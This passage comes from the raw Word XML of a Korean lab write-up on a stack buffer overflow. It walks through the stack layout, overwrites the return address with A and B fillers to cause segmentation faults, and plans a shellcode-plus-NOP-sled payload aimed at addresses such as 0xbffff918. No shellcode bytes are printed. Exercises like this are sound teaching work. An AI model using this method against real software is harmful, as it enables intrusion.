              <w:t>지역변수 공간을 정리하고 스택을 마무리 한다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00384544" w:rsidRDefault="00384544">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006B2E34" w:rsidRDefault="006B2E34" w:rsidP="006B2E34">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:ind w:leftChars="0"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Main + 3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">에서 버퍼가 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>256</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>개 할당 되는 것을 확인 가능.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B2E34" w:rsidRDefault="006B2E34" w:rsidP="006B2E34">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr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따라서 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[buffer256] + [ebp4] + [ret4]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B2E34" w:rsidRDefault="00205BCA" w:rsidP="006B2E3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151A39" wp14:editId="0BCA0B55">
                  <wp:extent cx="6143625" cy="2419350"/>
                  <wp:effectExtent l="0" t="0" r="952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3625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5BCA" w:rsidRDefault="00205BCA" w:rsidP="006B2E34">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Break</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>를 메인함수의 시작과 종료지점에 걸어준다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00205BCA" w:rsidRDefault="00FC7FE2" w:rsidP="006B2E34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버퍼와 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>ebp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">메모리 값을 합한 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>260</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">만큼 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">를채우고 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>ret</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">에 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>를 채운다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FC7FE2" w:rsidRDefault="00FC7FE2" w:rsidP="006B2E3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DC575E" wp14:editId="6226E3CA">
                  <wp:extent cx="6153150" cy="95250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15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7FE2" w:rsidRDefault="00FC7FE2" w:rsidP="006B2E34">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>예상대로 S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">egmentation fault -&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>버퍼 오버플로우가 일어 났다</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>똑 같은 그림이라 그림은 생략하지만</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FC7FE2" w:rsidRDefault="00FC7FE2" w:rsidP="006B2E34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A만 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>256</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>개를 넣었을땐 그냥 오류가 떳고</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FC7FE2" w:rsidRDefault="00FC7FE2" w:rsidP="006B2E34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A만 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>260</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>개를 넣었을땐 역시 S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>egmentation fault</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>가 일어났다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FC7FE2" w:rsidRDefault="00FC7FE2" w:rsidP="006B2E34">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pP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>260,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>개를 넣어도 역시 S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>egmentation fault</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>가 일어났다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FC7FE2" w:rsidRDefault="00067F3E" w:rsidP="006B2E34">
            <w:pPr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3642995</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>2441575</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2028825" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
                      <wp:wrapNone/>
                      <wp:docPr id="10" name="자유형: 도형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8825" cy="133350"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="connsiteX0" fmla="*/ 0 w 2028825"/>
                                  <a:gd name="connsiteY0" fmla="*/ 0 h 133350"/>
                                  <a:gd name="connsiteX1" fmla="*/ 2028825 w 2028825"/>
                                  <a:gd name="connsiteY1" fmla="*/ 0 h 133350"/>
                                  <a:gd name="connsiteX2" fmla="*/ 2028825 w 2028825"/>
                                  <a:gd name="connsiteY2" fmla="*/ 133350 h 133350"/>
                                  <a:gd name="connsiteX3" fmla="*/ 0 w 2028825"/>
                                  <a:gd name="connsiteY3" fmla="*/ 133350 h 133350"/>
                                  <a:gd name="connsiteX4" fmla="*/ 0 w 2028825"/>
                                  <a:gd name="connsiteY4" fmla="*/ 0 h 1333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028825" h="133350">
                                    <a:moveTo>
                                      <a:pt x="0" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="2028825" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="2028825" y="133350"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13335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630B15" id="자유형: 도형 10" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:286.85pt;margin-top:192.25pt;width:159.75pt;height:1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2882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&#10;" path="m,l2028825,r,133350l,133350,,xe" filled="f" strokecolor="red" strokeweight="2pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;2028825,0;2028825,133350;0,133350;0,0" o:connectangles="0,0,0,0,0"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00FC7FE2">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BBF3AD9" wp14:editId="37F4A32F">
                  <wp:extent cx="6105525" cy="4105275"/>
                  <wp:effectExtent l="0" t="0" r="9525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5" cy="410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7FE2" w:rsidRDefault="00323A96" w:rsidP="006B2E34">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidR="00FC7FE2">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>sp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>-256</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">지점부터 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>개의 메모리값을 확인.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00323A96" w:rsidRDefault="00323A96" w:rsidP="006B2E34">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>0x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>41414141-&gt;0x42424242</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>로 바뀌는 부분을 주목하자</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00913F3B" w:rsidRDefault="00913F3B" w:rsidP="006B2E34">
            <w:pPr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  <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">은 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">의 아스키 코드이며 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">는 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>의 아스키 코드이다</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FC7FE2" w:rsidRDefault="00070105" w:rsidP="006B2E34">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Shellcode[</w:t>
            </w:r>
            <w:r w:rsidR="00C80523">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>]+nop[23</w:t>
            </w:r>
            <w:r w:rsidR="00164754">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>]+ret[0xbffff92</w:t>
            </w:r>
            <w:r w:rsidR="00164754">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>으로 페이로드를 짯다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00070105" w:rsidRDefault="00070105" w:rsidP="006B2E34">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00164754" w:rsidRDefault="00164754" w:rsidP="006B2E3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E71037" wp14:editId="4565BE29">
                  <wp:extent cx="6645910" cy="1229995"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="825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22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76BA" w:rsidRDefault="009E76BA" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof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9764627" wp14:editId="096E25A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229235</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6238875" cy="561975"/>
                      <wp:effectExtent l="0" t="0" r="28575" b="28575"/>
                      <wp:wrapNone/>
                      <wp:docPr id="17" name="직사각형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38875" cy="561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E76BA" w:rsidRDefault="009E76BA" w:rsidP="009E76BA">
                                  <w:pPr>
                                    <w:jc w:val="lef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코어파일은 프로그램이 종료되었을 때 운영체제가 디스크에 남기는 파일이며</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w:rsidR="009E76BA" w:rsidRPr="009E76BA" w:rsidRDefault="009E76BA" w:rsidP="009E76BA">
                                  <w:pPr>
                                    <w:jc w:val="lef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코어파일을 분석해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gdb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에서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buffer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의 시작주소에 적재된 쉘코드를 실행 시킬 수 있다.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764627" id="직사각형 17" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:-.4pt;margin-top:18.05pt;width:491.25pt;height:4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7GsugIAAMwFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u2zAMvg/YOwi6r47Tpj9BnSJo0WFA&#10;0RZrh54VWYoFyJImKbGzW/cOBfYGu+yw5xq6dxgl2e7Pig0YloNDieRH8hPJw6O2lmjNrBNaFTjf&#10;GmHEFNWlUMsCf7g+fbOPkfNElURqxQq8YQ4fzV6/OmzMlI11pWXJLAIQ5aaNKXDlvZlmmaMVq4nb&#10;0oYpUHJta+LhaJdZaUkD6LXMxqPRbtZoWxqrKXMObk+SEs8iPueM+gvOHfNIFhhy8/Fr43cRvtns&#10;kEyXlphK0C4N8g9Z1EQoCDpAnRBP0MqK36BqQa12mvstqutMcy4oizVANfnoWTVXFTEs1gLkODPQ&#10;5P4fLD1fX1okSni7PYwUqeGN7r/e3n/+9uP77c8vdwiugaPGuCmYXplL250ciKHglts6/EMpqI28&#10;bgZeWesRhcvd8fb+/t4EIwq6yW5+ADLAZA/exjr/lukaBaHAFt4t0knWZ84n094kBHNaivJUSBkP&#10;oVfYsbRoTeCVF8u8A39iJRVqCrydQ+i/Ifj2BQRIVirIOTCRao+S30gW8KR6zzjwCNWOU4CnWRFK&#10;mfJ5UlWkZCnZyQh+fbq9R2QmAgZkDmUO2B1Ab5lAeuzEU2cfXFkcgMF59KfEkvPgESNr5QfnWiht&#10;XwKQUFUXOdn3JCVqAku+XbSxx8bBMtwsdLmBvrM6DaQz9FTAy58R5y+JhQmEWYWt4i/gw6WGl9Od&#10;hFGl7aeX7oM9DAZoMWpgogvsPq6IZRjJdwpG5iDf2QkrIB52JntjONjHmsVjjVrVxxraKYf9ZWgU&#10;g72Xvcitrm9g+cxDVFARRSF2gam3/eHYp00D64uy+Tyawdgb4s/UlaEBPPAcOvu6vSHWdO3vYXDO&#10;dT/9ZPpsCpJt8FR6vvKaizgiD7x2LwArI7ZSt97CTnp8jlYPS3j2CwAA//8DAFBLAwQUAAYACAAA&#10;ACEA3POXCN4AAAAIAQAADwAAAGRycy9kb3ducmV2LnhtbEyPT0+DQBTE7yZ+h80z8WYXakVElsaY&#10;+KcHD1YTr6/wYAnsW8JuC3x7tyc9TmYy85t8O5tenGh0rWUF8SoCQVzaquVGwffXy00KwnnkCnvL&#10;pGAhB9vi8iLHrLITf9Jp7xsRSthlqEB7P2RSulKTQbeyA3Hwajsa9EGOjaxGnEK56eU6ihJpsOWw&#10;oHGgZ01ltz8aBd3HrmuH97SuX/VyNy344+fNm1LXV/PTIwhPs/8Lwxk/oEMRmA72yJUTvYIzuFdw&#10;m8Qggv2QxvcgDiG33iQgi1z+P1D8AgAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACtzsay6&#10;AgAAzAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhANzz&#10;lwjeAAAACAEAAA8AAAAAAAAAAAAAAAAAFAUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" fillcolor="white [3212]" strokecolor="black [3213]" strokeweight=".25pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w:rsidR="009E76BA" w:rsidRDefault="009E76BA" w:rsidP="009E76BA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코어파일은 프로그램이 종료되었을 때 운영체제가 디스크에 남기는 파일이며</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="009E76BA" w:rsidRPr="009E76BA" w:rsidRDefault="009E76BA" w:rsidP="009E76BA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코어파일을 분석해 </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>gdb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에서 </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>buffer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의 시작주소에 적재된 쉘코드를 실행 시킬 수 있다.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w:t xml:space="preserve">라고 뜨면서 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>core</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>파일이 생성 되었다.</w:t>
            </w:r>
            <w:r w:rsidR="00154239">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="00154239">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>리턴 주소를 잘못 찾음</w:t>
            </w:r>
            <w:r w:rsidR="00154239">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009E76BA" w:rsidRDefault="009E76BA" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009E76BA" w:rsidRDefault="009E76BA" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009E76BA" w:rsidRDefault="009E76BA" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004226B4" w:rsidRDefault="004226B4" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD70A1" w:rsidRDefault="00BD70A1" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004226B4" w:rsidRDefault="004226B4" w:rsidP="009E76BA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다시 찾아보았다.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009E76BA" w:rsidRDefault="004226B4" w:rsidP="009E76B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316F39" wp14:editId="3E81BE89">
                  <wp:extent cx="6645910" cy="3867150"/>
                  <wp:effectExtent l="0" t="0" r="254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86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76BA" w:rsidRDefault="004226B4" w:rsidP="009E76BA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A가 정확히 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">0xbffff918 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>부터 시작한다.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004226B4" w:rsidRDefault="004226B4" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>쉘코드를 바꿔서 쉨코드[2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>5]+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>놉[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>235]+ret</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>를 해보았다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004226B4" w:rsidRDefault="004226B4" w:rsidP="009E76B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46837C" wp14:editId="188963BA">
                  <wp:extent cx="6645910" cy="2320290"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="381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32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76BA" w:rsidRDefault="004226B4" w:rsidP="009E76BA">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>b</w:t>
